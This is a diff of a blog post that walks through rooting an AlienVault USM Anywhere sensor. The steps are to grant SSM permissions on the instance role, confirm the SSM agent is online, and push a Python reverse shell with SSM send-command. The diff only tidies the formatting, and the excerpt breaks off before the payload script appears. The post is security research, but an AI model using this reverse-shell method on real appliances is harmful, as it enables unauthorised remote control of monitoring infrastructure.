pgaulon/pgaulon.github.io/2021-05-04-root-alienvault-usm-sensor.md

 ### Process
 The process is to:

-1. add the necessary permissions on the USM Anywhere instance role
+- add the necessary permissions on the USM Anywhere instance role

 ![ssm-permissions](./img/2021-05-04-root-alienvault-usm-sensor/ssm-permissions.png)

-2. wait few minutes for the SSM agent to come online.
+- wait a few minutes for the SSM agent to come online.
 This step is optional and requires extra permissions to describe instances information.

 ```
 $ aws ssm describe-instance-information --output text --query "InstanceInformationList[*]"
 3.0.529.0	USMA-Sensor	172.31.36.0	i-[instanceID]	False	1620139052.209	Online	Ubuntu	Linux	16.04	EC2Instance
 ```

-3. use SSM send-command to send reverse shell.
+- use SSM send-command to send reverse shell.
 For the reverse shell to work I used a python one, and distributed it from a python web server.

 ```
 $ cat lol.py